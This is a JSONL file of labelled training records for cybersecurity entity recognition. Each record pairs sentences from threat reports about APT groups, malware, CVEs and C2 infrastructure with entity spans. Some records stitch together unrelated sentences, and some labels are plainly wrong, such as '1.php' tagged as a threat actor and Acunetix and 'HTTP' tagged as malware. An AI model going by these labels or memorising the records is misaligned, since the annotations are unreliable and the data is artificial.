{"text": "It is plausible that Artifact #1 could be present on other servers under different names , although it is also likely that the attacker only left it on servers to which they required maintainenance of persistent access .", "spans": {}, "info": {"id": "cyberner_stix_train_002859", "source": "cyberner_stix_train"}}
{"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats . Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader – a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor . PREDATOR is intended to work with another spyware component called “ ALIEN ” ( it ’s not “ Alien vs. Predator ” this time ; they ’re working together ) .", "spans": {"MALWARE: FinFisher": [[0, 9]], "SYSTEM: Windows": [[32, 39]], "ORGANIZATION: M-Trends": [[127, 135]], "ORGANIZATION: BlackBerry Cylance": [[309, 327]], "MALWARE: Denes backdoor": [[426, 440]], "ORGANIZATION: ESET": [[488, 492]], "MALWARE: Remy backdoor": [[523, 536]], "MALWARE: PREDATOR": [[539, 547]], "MALWARE: ALIEN": [[608, 613]], "MALWARE: Alien": [[630, 635]], "MALWARE: Predator": [[640, 648]]}, "info": {"id": "cyberner_stix_train_002860", "source": "cyberner_stix_train"}}
{"text": "“ Agent Smith ” needs to be updated/installed without the user ’ s consent . Just like last time , Buhtrap is spreading through exploits embedded in news outlets . exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "ORGANIZATION: news outlets": [[149, 161]], "FILEPATH: exe": [[164, 167]], "FILEPATH: z.exe": [[230, 235]], "FILEPATH: ex.exe": [[239, 245]], "ORGANIZATION: RussianPanda": [[268, 280]]}, "info": {"id": "cyberner_stix_train_002861", "source": "cyberner_stix_train"}}
{"text": "But the apps , with their many millions of users , have captured the attention of the bad actors , too , who are exploiting the popularity of Netflix to spread malware . Like the majority of APT groups , Silence uses phishing as their infection vector . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"ORGANIZATION: Netflix": [[142, 149]], "THREAT_ACTOR: Silence": [[204, 211]], "MALWARE: Carbanak": [[264, 272]], "ORGANIZATION: banks": [[309, 314]], "ORGANIZATION: electronic payment": [[319, 337]], "ORGANIZATION: space": [[379, 384]]}, "info": {"id": "cyberner_stix_train_002862", "source": "cyberner_stix_train"}}
{"text": "* Actually , we are currently investigating whether this group might also be behind a large-scale web-oriented attack at the end of 2018 using code injection and exploiting SQL vulnerabilities . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": {"VULNERABILITY: SQL vulnerabilities": [[173, 192]], "THREAT_ACTOR: APT group": [[304, 313]]}, "info": {"id": "cyberner_stix_train_002863", "source": "cyberner_stix_train"}}
{"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company . The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n’t been modified . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"MALWARE: ViperRAT": [[0, 8]], "ORGANIZATION: HBGary": [[132, 138], [223, 229]], "ORGANIZATION: American video game company": [[248, 275]], "TOOL: watchdog": [[282, 290]], "MALWARE: ZxShell": [[330, 337]], "THREAT_ACTOR: the former MiniDuke attackers": [[439, 468]]}, "info": {"id": "cyberner_stix_train_002864", "source": "cyberner_stix_train"}}
{"text": "We discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": {"THREAT_ACTOR: Suckfly": [[14, 21]]}, "info": {"id": "cyberner_stix_train_002865", "source": "cyberner_stix_train"}}
{"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log . To do this , it employs a number of specific commands via DNSMessenger . Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 . Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": {"TOOL: DNSMessenger": [[181, 193]], "TOOL: email": [[213, 218]], "VULNERABILITY: CVE-2012-0158": [[279, 292]], "THREAT_ACTOR: Scheduled Task APT29": [[318, 338]]}, "info": {"id": "cyberner_stix_train_002866", "source": "cyberner_stix_train"}}
{"text": "We started with most frequently used C & C domains “ a * * * d.com ” , “ a * * * d.net ” , and “ a * * * d.org ” . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device . In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"MALWARE: Acunetix Web Vulnerability Scanner": [[149, 183]], "TOOL: w3wp.exe": [[511, 519]]}, "info": {"id": "cyberner_stix_train_002867", "source": "cyberner_stix_train"}}
{"text": "The description is based on analysis of the sample described in Table 3 below , which was of interest given its C2 domain mefound [ . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . The targets of TG-4127 include military , government and defense sectors .", "spans": {"THREAT_ACTOR: APT41": [[157, 162]], "ORGANIZATION: European conglomerate": [[174, 195]], "THREAT_ACTOR: TG-4127": [[277, 284]], "ORGANIZATION: military": [[293, 301]], "ORGANIZATION: government": [[304, 314]], "ORGANIZATION: defense sectors": [[319, 334]]}, "info": {"id": "cyberner_stix_train_002868", "source": "cyberner_stix_train"}}
{"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": {"SYSTEM: Android banking app": [[53, 72]], "SYSTEM: Bank Austria Security App": [[219, 244]], "THREAT_ACTOR: actors": [[314, 320]], "ORGANIZATION: governments": [[436, 447]], "ORGANIZATION: organizations": [[460, 473]]}, "info": {"id": "cyberner_stix_train_002869", "source": "cyberner_stix_train"}}
{"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "ORGANIZATION: personnel": [[56, 65]], "ORGANIZATION: military": [[77, 85]], "ORGANIZATION: political": [[90, 99]], "MALWARE: Gh0st RAT": [[227, 236]], "ORGANIZATION: People's Republic": [[340, 357]]}, "info": {"id": "cyberner_stix_train_002870", "source": "cyberner_stix_train"}}
{"text": "EventBot screen lock with support for Samsung devices A new method to handle screen lock with support for Samsung devices . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": {"MALWARE: EventBot": [[0, 8]], "ORGANIZATION: Samsung": [[38, 45], [106, 113]], "MALWARE: malware": [[128, 135]], "TOOL: CMD/PowerShell": [[164, 178]], "THREAT_ACTOR: attackers": [[196, 205]], "ORGANIZATION: CTU": [[294, 297]], "THREAT_ACTOR: COBALT GYPSY": [[330, 342]]}, "info": {"id": "cyberner_stix_train_002871", "source": "cyberner_stix_train"}}
{"text": "To support the rapid growth and pace of malware distribution efforts , SilverTerrier actors are in constant need of domains to serve as C2 nodes . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[71, 91]], "MALWARE: WhiteBear": [[166, 175]], "ORGANIZATION: embassies": [[200, 209]]}, "info": {"id": "cyberner_stix_train_002872", "source": "cyberner_stix_train"}}
{"text": "The information is written into a file on the device . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism . It can range from asking “ customers ” to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": {"THREAT_ACTOR: ScarCruft": [[55, 64]], "MALWARE: GRIFFON": [[219, 226]], "TOOL: JScript": [[252, 259]], "THREAT_ACTOR: cyber attacks": [[422, 435]]}, "info": {"id": "cyberner_stix_train_002873", "source": "cyberner_stix_train"}}
{"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family . The Lazarus Group employs a variety of RATs that operate in both client mode and server mode . NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information . Modules may be downloaded from a remote server or loaded from disk .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "ORGANIZATION: Lookout": [[43, 50]], "MALWARE: Shedun": [[95, 101]], "THREAT_ACTOR: Lazarus Group": [[123, 136]], "TOOL: RATs": [[158, 162]], "MALWARE: NanoCore": [[214, 222]], "MALWARE: Trojan.Nancrat": [[225, 239]]}, "info": {"id": "cyberner_stix_train_002874", "source": "cyberner_stix_train"}}
{"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": {"TOOL: operating system-supported feature": [[19, 53]]}, "info": {"id": "cyberner_stix_train_002875", "source": "cyberner_stix_train"}}
{"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"THREAT_ACTOR: TG-3390": [[148, 155]], "ORGANIZATION: CTU": [[204, 207]], "VULNERABILITY: zero-day": [[262, 270]]}, "info": {"id": "cyberner_stix_train_002876", "source": "cyberner_stix_train"}}
{"text": "The observed timezones correspond to the pre-2011 definition of Moscow Standard Time ( MSK ) , which was UTC+3 during the winter and UTC+4 during the summer .", "spans": {}, "info": {"id": "cyberner_stix_train_002877", "source": "cyberner_stix_train"}}
{"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": {"ORGANIZATION: GitHub": [[66, 72]], "MALWARE: malware": [[90, 97]], "MALWARE: DLLs": [[114, 118]], "FILEPATH: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[205, 262]]}, "info": {"id": "cyberner_stix_train_002878", "source": "cyberner_stix_train"}}
{"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional functionality , such as executing commands sent by the C & C , clicking photos , capturing screenshots , stealing location information , and more . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"TOOL: FuzzBunch": [[246, 255]], "THREAT_ACTOR: Shadow Brokers": [[356, 370]], "THREAT_ACTOR: NEODYMIUM": [[381, 390]]}, "info": {"id": "cyberner_stix_train_002879", "source": "cyberner_stix_train"}}
{"text": "arrive ; at least that was how it used to be before the age of cyber wars . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": {"VULNERABILITY: zero-day exploit": [[201, 217]], "VULNERABILITY: CVE-2014-4148": [[220, 233]], "THREAT_ACTOR: actor": [[329, 334]]}, "info": {"id": "cyberner_stix_train_002880", "source": "cyberner_stix_train"}}
{"text": "TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "cyberner_stix_train_002881", "source": "cyberner_stix_train"}}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "THREAT_ACTOR: Tropic Trooper": [[256, 270]], "VULNERABILITY: CVE-2012-0158": [[296, 309]]}, "info": {"id": "cyberner_stix_train_002882", "source": "cyberner_stix_train"}}
{"text": "HTML/JS launcher page serves Flash exploit .", "spans": {"TOOL: HTML/JS": [[0, 7]], "TOOL: Flash": [[29, 34]]}, "info": {"id": "cyberner_stix_train_002883", "source": "cyberner_stix_train"}}
{"text": "While we do not have complete targeting , information associated with these Poison Ivy samples , several of the decoy files were in Chinese and appear to be part of a 2016 campaign targeting organizations in Taiwan with political-themed lures . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": {"MALWARE: Poison Ivy": [[76, 86]], "MALWARE: BalkanDoor": [[278, 288]], "VULNERABILITY: CVE-2018-20250": [[473, 487]], "THREAT_ACTOR: APT33": [[490, 495]], "ORGANIZATION: aviation sector": [[550, 565]], "ORGANIZATION: energy sector": [[600, 613]], "ORGANIZATION: petrochemical": [[627, 640]]}, "info": {"id": "cyberner_stix_train_002884", "source": "cyberner_stix_train"}}
{"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems located in Thailand .", "spans": {"ORGANIZATION: social media": [[64, 76]], "ORGANIZATION: Unit 42": [[159, 166]], "MALWARE: Bookworm": [[211, 219]], "TOOL: C2": [[220, 222]]}, "info": {"id": "cyberner_stix_train_002885", "source": "cyberner_stix_train"}}
{"text": "Upon opening the file , the user is asked to enable “ Google Play Protect ” as shown in Figure 2 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors . The second one is CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"SYSTEM: Google Play": [[54, 65]], "THREAT_ACTOR: Butterfly": [[99, 108]], "ORGANIZATION: multi-billion dollar companies": [[122, 152]], "ORGANIZATION: pharmaceutical": [[195, 209]], "ORGANIZATION: commodities sectors": [[216, 235]], "THREAT_ACTOR: CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey": [[256, 302]], "VULNERABILITY: the complexity of managing CSP rules": [[473, 509]], "VULNERABILITY: vulnerability": [[517, 530]], "SYSTEM: Google Analytics": [[570, 586]]}, "info": {"id": "cyberner_stix_train_002886", "source": "cyberner_stix_train"}}
{"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea . so dword_745BB58C * ( dword_745BB58C – 1 ) The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"SYSTEM: Google Play": [[46, 57]], "THREAT_ACTOR: APT38": [[243, 248]], "THREAT_ACTOR: cyber operators": [[259, 274]], "THREAT_ACTOR: TEMP.Hermit": [[285, 296]], "ORGANIZATION: Lab 110": [[317, 324]], "TOOL: Python script": [[492, 505]], "ORGANIZATION: CrowdStrike researchers": [[533, 556]], "THREAT_ACTOR: Play ransomware attacks": [[599, 622]]}, "info": {"id": "cyberner_stix_train_002887", "source": "cyberner_stix_train"}}
{"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems . ZXSockProxy Run a Sock 4 & 5 Proxy server . Learn How ThreatConnect Can Help Protect Email From Phishing and BEC Attacks", "spans": {"ORGANIZATION: FBI": [[93, 96]], "THREAT_ACTOR: group of malicious cyber actors": [[108, 139]], "THREAT_ACTOR: APT6": [[153, 157]], "THREAT_ACTOR: 1.php": [[161, 166]], "TOOL: customized malicious software": [[267, 296]], "TOOL: ThreatConnect": [[386, 399]]}, "info": {"id": "cyberner_stix_train_002888", "source": "cyberner_stix_train"}}
{"text": "The “ SendData ” export sends a HTTP POST request using a hardcoded URI “ /store/ “ .", "spans": {}, "info": {"id": "cyberner_stix_train_002889", "source": "cyberner_stix_train"}}
{"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {"TOOL: Word": [[32, 36]], "THREAT_ACTOR: PLATINUM": [[39, 47]], "VULNERABILITY: CVE-2015-2545": [[153, 166]], "THREAT_ACTOR: attacker": [[200, 208]], "TOOL: emails": [[341, 347]], "TOOL: email": [[428, 433]]}, "info": {"id": "cyberner_stix_train_002890", "source": "cyberner_stix_train"}}
{"text": "Once the payload is prepared , “ Agent Smith ” uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software . Dexphot halts the infection process immediately if an antivirus product is found running . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: Agent Smith": [[33, 44]], "VULNERABILITY: Janus": [[98, 103]], "TOOL: Lurk banking trojan": [[267, 286]], "ORGANIZATION: banks": [[369, 374]], "MALWARE: Dexphot": [[390, 397]], "ORGANIZATION: Mastodon": [[529, 537]], "ORGANIZATION: Randy McEoin": [[546, 558]]}, "info": {"id": "cyberner_stix_train_002891", "source": "cyberner_stix_train"}}
{"text": "We also found similarities in two older samples disguised as a Google service and , subsequently , as a music app after further investigation . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system . . Limited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment ; however , like STRATOFEAR , TIEDYE was likely deployed as a second - stage backdoor by FULLHOUSE.DOORED .", "spans": {"ORGANIZATION: Google": [[63, 69]], "TOOL: wget": [[171, 175]], "MALWARE: TIEDYE": [[359, 365], [446, 452]], "MALWARE: STRATOFEAR": [[433, 443]]}, "info": {"id": "cyberner_stix_train_002892", "source": "cyberner_stix_train"}}
{"text": "For example , the default configuration file with injects is non-operational , and the malware contains no fake built-in windows requesting bank card details . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": {"ORGANIZATION: Symantec": [[160, 168]], "THREAT_ACTOR: Waterbug": [[214, 222]], "TOOL: Remote Administration Tool": [[384, 410]]}, "info": {"id": "cyberner_stix_train_002893", "source": "cyberner_stix_train"}}
{"text": "It seems Eset has discovered and published on a new malware module created by Turla . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": {"ORGANIZATION: Eset": [[9, 13]], "THREAT_ACTOR: Turla": [[78, 83]], "FILEPATH: JS dropper": [[129, 139]], "FILEPATH: JS decryptor": [[162, 174]], "FILEPATH: KopiLuwak": [[254, 263]]}, "info": {"id": "cyberner_stix_train_002894", "source": "cyberner_stix_train"}}
{"text": "According to Kaspersky , the Equation Group has more than 60 members and has been operating since at least 2001 . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "TOOL: emails": [[143, 149]], "ORGANIZATION: bank employees": [[168, 182]]}, "info": {"id": "cyberner_stix_train_002895", "source": "cyberner_stix_train"}}
{"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ . The PowerShell version of the Trojan also has the ability to get screenshots . From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"MALWARE: PowerShell": [[82, 92]], "ORGANIZATION: FireEye": [[189, 196]], "THREAT_ACTOR: APT12": [[206, 211]], "MALWARE: RIPTIDE": [[222, 229]], "MALWARE: HTTP": [[254, 258]], "TOOL: C2": [[297, 299]]}, "info": {"id": "cyberner_stix_train_002896", "source": "cyberner_stix_train"}}
{"text": "The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack .", "spans": {"VULNERABILITY: Trojan": [[41, 47]]}, "info": {"id": "cyberner_stix_train_002897", "source": "cyberner_stix_train"}}
{"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": {"VULNERABILITY: CVE-2013-0640": [[64, 77]], "TOOL: MiniDuke": [[88, 96]], "VULNERABILITY: zero-day": [[150, 158]], "THREAT_ACTOR: group": [[180, 185]], "THREAT_ACTOR: Turla APT group": [[209, 224]]}, "info": {"id": "cyberner_stix_train_002898", "source": "cyberner_stix_train"}}
{"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany . From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: Two-tailed Scorpion/APT-C-23": [[100, 128]], "ORGANIZATION: banks": [[227, 232], [295, 300]], "TOOL: banking Trojan": [[249, 263]], "TOOL: GozNym": [[264, 270]], "THREAT_ACTOR: APT1": [[360, 364]], "MALWARE: WEBC2 backdoors": [[375, 390]], "MALWARE: Winnti malware": [[530, 544]]}, "info": {"id": "cyberner_stix_train_002899", "source": "cyberner_stix_train"}}
{"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) .", "spans": {"MALWARE: INI file": [[4, 12]], "TOOL: PowerShell": [[100, 110]], "MALWARE: VBS file": [[151, 159]], "MALWARE: WScript.exe": [[179, 190]], "FILEPATH: Ploutus-D": [[193, 202]], "THREAT_ACTOR: attackers": [[219, 228]]}, "info": {"id": "cyberner_stix_train_002900", "source": "cyberner_stix_train"}}
{"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": {"SYSTEM: Android": [[33, 40]], "MALWARE: BrainTest": [[57, 66]], "SYSTEM: Google Play": [[91, 102]], "THREAT_ACTOR: Patchwork": [[121, 130]], "MALWARE: MS PowerPoint document": [[139, 161]], "VULNERABILITY: CVE-2014-6352": [[187, 200]], "TOOL: C2": [[229, 231]], "THREAT_ACTOR: APT10": [[259, 264]], "MALWARE: dynamic-DNS domains": [[326, 345]]}, "info": {"id": "cyberner_stix_train_002901", "source": "cyberner_stix_train"}}
{"text": "It is our hope that by providing additional indicators , end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises .", "spans": {"MALWARE: Shamoon2": [[146, 154]]}, "info": {"id": "cyberner_stix_train_002902", "source": "cyberner_stix_train"}}
{"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": {"TOOL: Linux.GreedyAntd": [[53, 69]]}, "info": {"id": "cyberner_stix_train_002903", "source": "cyberner_stix_train"}}
{"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": {"MALWARE: EternalRomance": [[159, 173]], "MALWARE: EternalSynergy": [[187, 201]], "MALWARE: CVE-2017-0143": [[220, 233]], "MALWARE: DropIt": [[368, 374]]}, "info": {"id": "cyberner_stix_train_002904", "source": "cyberner_stix_train"}}
{"text": "In this case , the Dukes first attempted to infect large numbers of potential targets with CozyDuke ( and in a more obvious manner than previously seen ) .", "spans": {"THREAT_ACTOR: Dukes": [[19, 24]], "MALWARE: CozyDuke": [[91, 99]]}, "info": {"id": "cyberner_stix_train_002905", "source": "cyberner_stix_train"}}
{"text": "That version flags messages \" containing certain language associated with junk texts and flags numbers associated with junk calls and not in a user 's contacts , '' the company says . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . C2 : www.gokickes.com .", "spans": {"VULNERABILITY: CVE-2017-11882": [[250, 264]], "MALWARE: 'NavShExt.dll'": [[331, 345]], "MALWARE: iexplore.exe": [[376, 388]], "TOOL: C2": [[469, 471]], "DOMAIN: www.gokickes.com": [[474, 490]]}, "info": {"id": "cyberner_stix_train_002906", "source": "cyberner_stix_train"}}
{"text": "] today test [ . KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . This output reveals the following changes when compared with earlier variants : Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": {"TOOL: KeyBoy": [[17, 23]], "ORGANIZATION: Microsoft": [[267, 276], [384, 393]], "SYSTEM: Exchange Server": [[299, 314]]}, "info": {"id": "cyberner_stix_train_002907", "source": "cyberner_stix_train"}}
{"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Furthermore , based on the group ’s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they ’re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities . Last month , NoEscape posted 7 victims on their leak site .", "spans": {"ORGANIZATION: CTU": [[137, 140]], "THREAT_ACTOR: TG-3390": [[192, 199]], "MALWARE: NoEscape": [[668, 676]]}, "info": {"id": "cyberner_stix_train_002908", "source": "cyberner_stix_train"}}
{"text": "We go through the Winnti implant installation process and explore how Windows Defender ATP can capture such attacker methods and tools and provide visualized contextual information that can aid in actual attack investigation and response .", "spans": {"MALWARE: Winnti": [[18, 24]], "TOOL: Windows Defender ATP": [[70, 90]]}, "info": {"id": "cyberner_stix_train_002909", "source": "cyberner_stix_train"}}
{"text": "Check Point has worked closely with Google and at the time of publishing , no malicious apps remain on the Play Store . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future . For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola ’s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[36, 42]], "SYSTEM: Play Store": [[107, 117]], "TOOL: Bookworm": [[189, 197]], "ORGANIZATION: Angolan organizations": [[288, 309]], "MALWARE: WellMail": [[489, 497]]}, "info": {"id": "cyberner_stix_train_002910", "source": "cyberner_stix_train"}}
{"text": "The GeminiDuke infostealer has occasionally been wrapped with a loader that appears to be unique to GeminiDuke and has never been observed being used with any of the other Duke toolsets .", "spans": {"MALWARE: GeminiDuke": [[4, 14], [100, 110]], "THREAT_ACTOR: Duke": [[172, 176]]}, "info": {"id": "cyberner_stix_train_002911", "source": "cyberner_stix_train"}}
{"text": "The Bart ransom screen was visually similar to Locky ’s but Bart had one important distinction : it could encrypt files without contacting a command and control server .", "spans": {"MALWARE: Bart": [[4, 8], [60, 64]], "MALWARE: Locky": [[47, 52]]}, "info": {"id": "cyberner_stix_train_002912", "source": "cyberner_stix_train"}}
{"text": "Victim host must have a vulnerable version of Flash installed .", "spans": {"TOOL: Flash": [[46, 51]]}, "info": {"id": "cyberner_stix_train_002913", "source": "cyberner_stix_train"}}
